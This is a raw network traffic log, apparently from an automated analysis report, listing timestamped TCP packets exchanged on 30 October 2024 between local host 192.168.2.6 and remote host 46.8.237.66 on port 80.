                              Oct 30, 2024 20:19:04.991823912 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.991858959 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.992161036 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.992171049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.992216110 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.034245968 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.034257889 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.034267902 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.034373999 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.034400940 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.034413099 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.034463882 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.034497023 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.034507990 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.034548044 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.034626961 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.034668922 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.075530052 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.075573921 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.075586081 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.075639963 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.109338999 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.109371901 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.109380960 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.109392881 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.109421968 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.109519005 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.109529972 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.109589100 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.109663010 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.109751940 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.109762907 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.109801054 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.109875917 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.109885931 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.109922886 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.109982967 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.109996080 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.110029936 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.110138893 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.110150099 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.110158920 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.110184908 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.110205889 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.110290051 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.110358000 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.110368013 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.110394955 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.110398054 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.110475063 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.110538960 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.110553026 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.110565901 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.110594034 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.110668898 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.110712051 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.110730886 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.110838890 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.110851049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.110862970 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.110888004 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.110922098 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.110979080 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.111007929 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.111049891 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.111064911 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.111145973 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.111176968 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.111190081 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.111334085 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.111345053 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.111356974 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.111367941 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.111387968 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.111403942 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.111543894 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.111553907 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.111599922 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.153851986 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.153901100 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.153913021 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.153914928 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.153958082 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.154050112 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.154061079 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.154128075 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.154130936 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.154155016 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.154202938 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.154360056 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.195133924 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.195157051 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.195167065 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.195228100 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.195239067 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.195255041 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.195333958 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.229052067 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.229125977 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.229135036 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.229207993 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.229209900 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.229221106 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.229233980 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.229263067 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.229295969 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.229381084 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.229475975 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.229486942 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.229525089 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.229584932 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.229635000 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.229701996 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.229711056 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.229720116 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.229732037 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.229741096 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.229748964 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.229774952 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.229995966 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.230005980 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.230043888 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.230139017 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.230150938 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.230185986 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.230298996 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.230319023 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.230329990 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.230339050 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.230341911 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.230345964 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.230381966 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.230413914 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.230582952 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.230674982 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.230685949 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.230696917 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.230707884 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.230717897 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.230724096 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.230751038 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.230786085 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.231087923 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.231194019 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.231204033 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.231244087 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.231342077 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.231353045 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.231363058 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.231373072 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.231386900 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.231415987 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.231594086 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.231605053 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.231641054 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.231681108 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.231693983 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.231729031 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.273571014 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.273621082 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.273632050 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.273696899 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.273727894 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.273797035 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.273807049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.273817062 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.273827076 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.273844004 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.273869991 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.274215937 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.315680981 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.315752983 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.315812111 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.315823078 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.315872908 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.349320889 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.349458933 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.349468946 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.349478960 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.349512100 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.349558115 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.349595070 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.349606991 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.349662066 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.349731922 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.349927902 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.349937916 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.349946022 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.349956036 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.349966049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.349971056 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.349977016 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.350008011 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.350194931 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.350205898 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.350217104 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.350228071 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.350248098 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.350290060 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.350356102 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.350368023 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.350378990 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.350402117 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.350440025 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.350665092 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.350676060 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.350687027 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.350697994 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.350744963 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.351006985 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.351017952 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.351030111 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.351039886 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.351049900 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.351080894 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.351309061 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.351352930 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.351489067 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.351501942 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.351512909 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.351546049 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.351667881 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.351716042 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.351881981 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.351895094 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.351905107 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.351916075 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.351928949 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.351970911 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.352026939 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.352039099 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.352081060 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.352197886 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.352394104 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.352404118 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.352416039 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.352437019 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.352466106 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.352538109 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.352550030 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.352590084 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.354830027 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.394129038 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.394141912 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.394153118 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.394197941 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.394284964 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.394295931 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.394334078 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.394439936 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.394450903 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.394484997 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.394594908 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.394634962 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.435554028 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.435568094 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.435579062 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.435645103 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.468136072 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.468147039 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.468158007 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.468197107 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.468224049 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.468224049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.468336105 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.468346119 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.468381882 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.468449116 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.468458891 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.468468904 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.468478918 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.468494892 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.468528986 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.468689919 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.468733072 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.468789101 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.468803883 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.468841076 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.469029903 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469042063 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469048977 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469059944 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469075918 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.469113111 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.469163895 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469249010 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469295025 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.469362974 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469372988 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469383001 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469393969 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469408989 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.469434023 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.469651937 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469665051 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469675064 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469706059 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.469814062 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469825029 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469835043 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.469861031 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.469897032 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.470084906 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470096111 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470105886 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470125914 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470134974 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470135927 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.470174074 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.470402002 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470412970 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470422983 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470443964 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.470479965 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.470592022 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470602989 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470613956 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470664024 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.470865011 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470875025 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470885038 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470896006 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470906973 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470912933 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.470916986 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470926046 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.470941067 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.470969915 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.512574911 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.512645006 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.512655020 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.512728930 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.512761116 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.512773037 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.512784004 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.512816906 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.512835979 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.512888908 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.512972116 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.513015985 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.513037920 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.513087988 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.513128042 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.554975033 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.554995060 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.555005074 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.555170059 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.588232994 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588282108 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.588306904 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588318110 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588366032 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.588484049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588495016 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588504076 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588571072 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.588773012 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588793993 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588804007 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588814974 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588825941 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588828087 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.588840008 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.588854074 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:05.588890076 CET4970980192.168.2.646.8.237.66
